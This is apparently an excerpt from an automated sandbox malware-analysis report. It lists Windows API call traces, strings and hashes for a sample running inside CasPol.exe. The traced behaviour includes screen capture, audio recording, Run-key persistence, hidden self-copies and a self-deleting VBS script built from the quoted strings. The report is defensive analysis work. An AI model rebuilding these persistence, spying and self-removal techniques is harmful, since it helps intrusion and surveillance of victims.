  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
• Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
• Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
• Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
• Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
• Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
• Instruction Fuzzy Hash:
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• DeleteDC.GDI32(?), ref: 0041805D
• DeleteDC.GDI32(00000000), ref: 00418060
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetCursorInfo.USER32(?), ref: 004180B5
• GetIconInfo.USER32(?,?), ref: 004180CB
• DeleteObject.GDI32(?), ref: 004180FA
• DeleteObject.GDI32(?), ref: 00418107
• DrawIcon.USER32(00000000,?,?,?), ref: 00418114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
• GetObjectA.GDI32(?,00000018,?), ref: 00418173
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
• DeleteDC.GDI32(?), ref: 0041827F
• DeleteDC.GDI32(00000000), ref: 00418282
• DeleteObject.GDI32(00000000), ref: 00418285
• GlobalFree.KERNEL32(00CC0020), ref: 00418290
• DeleteObject.GDI32(00000000), ref: 00418344
• GlobalFree.KERNEL32(?), ref: 0041834B
• DeleteDC.GDI32(?), ref: 0041835B
• DeleteDC.GDI32(00000000), ref: 00418366
• DeleteDC.GDI32(?), ref: 00418398
• DeleteDC.GDI32(00000000), ref: 0041839B
• DeleteObject.GDI32(?), ref: 004183A1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1352755160-865373369
• Opcode ID: 360205e778a26539c0e24db7fcbc6f0d40d0a456e06353622c31b649bf5ecbc7
• Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
• Opcode Fuzzy Hash: 360205e778a26539c0e24db7fcbc6f0d40d0a456e06353622c31b649bf5ecbc7
• Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
• ExitProcess.KERNEL32 ref: 0041151D
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
• GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                                                                  • API String ID: 4250697656-2665858469
                                                                                                                                                                                                                                  • Opcode ID: c45581ac137712a93e0a6d9d7403759df41187074cfe6de530b3a898dba868e6
                                                                                                                                                                                                                                  • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45581ac137712a93e0a6d9d7403759df41187074cfe6de530b3a898dba868e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-3168347843
• Opcode ID: e0ff0afc4033c8097fa85024f27eb8d2cb461690346b9c5d2a3b848a4b1a1dc9
• Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
• Opcode Fuzzy Hash: e0ff0afc4033c8097fa85024f27eb8d2cb461690346b9c5d2a3b848a4b1a1dc9
• Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
• ExitProcess.KERNEL32 ref: 0040C287
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-1998216422
• Opcode ID: c4fd55e8162246b3427640c0cf19c4ccb8f9c4dfa99a5eb786c2603916bf8397
• Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
• Opcode Fuzzy Hash: c4fd55e8162246b3427640c0cf19c4ccb8f9c4dfa99a5eb786c2603916bf8397
• Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
• SetEvent.KERNEL32 ref: 0041A38A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
• CloseHandle.KERNEL32 ref: 0041A3AB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                  • API String ID: 738084811-1408154895
                                                                                                                                                                                                                                  • Opcode ID: 019af8e3db36541d7291a6da923be061b250e09238e75596b659195e670c1a9a
                                                                                                                                                                                                                                  • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 019af8e3db36541d7291a6da923be061b250e09238e75596b659195e670c1a9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Write$Create
                                                                                                                                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                  • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                  • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-165202446
                                                                                                                                                                                                                                  • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                  • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                                                                                                                                                  • API String ID: 1579085052-1280438975
                                                                                                                                                                                                                                  • Opcode ID: dec0745cfa18f76b7aa5e2b406210ea6b89cc7dcad6710e0ba16a4f732bb1ce0
                                                                                                                                                                                                                                  • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dec0745cfa18f76b7aa5e2b406210ea6b89cc7dcad6710e0ba16a4f732bb1ce0
• Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
APIs
• LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
• GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
• GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
• GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
• GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
• GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
• GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
• GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
• GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
• API String ID: 2238633743-1483618772
• Opcode ID: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
• Instruction ID: e8a3204d4a55cb4efda40a2bc34e722aa0141a8d0c6d521df876b84b5db0583d
• Opcode Fuzzy Hash: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
• Instruction Fuzzy Hash: 88115430C1133896F760EBB5AC98F67BEECEB41684F60021BF504521A4D7B85587DF50
APIs
  • Part of subcall function 04571CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D1B
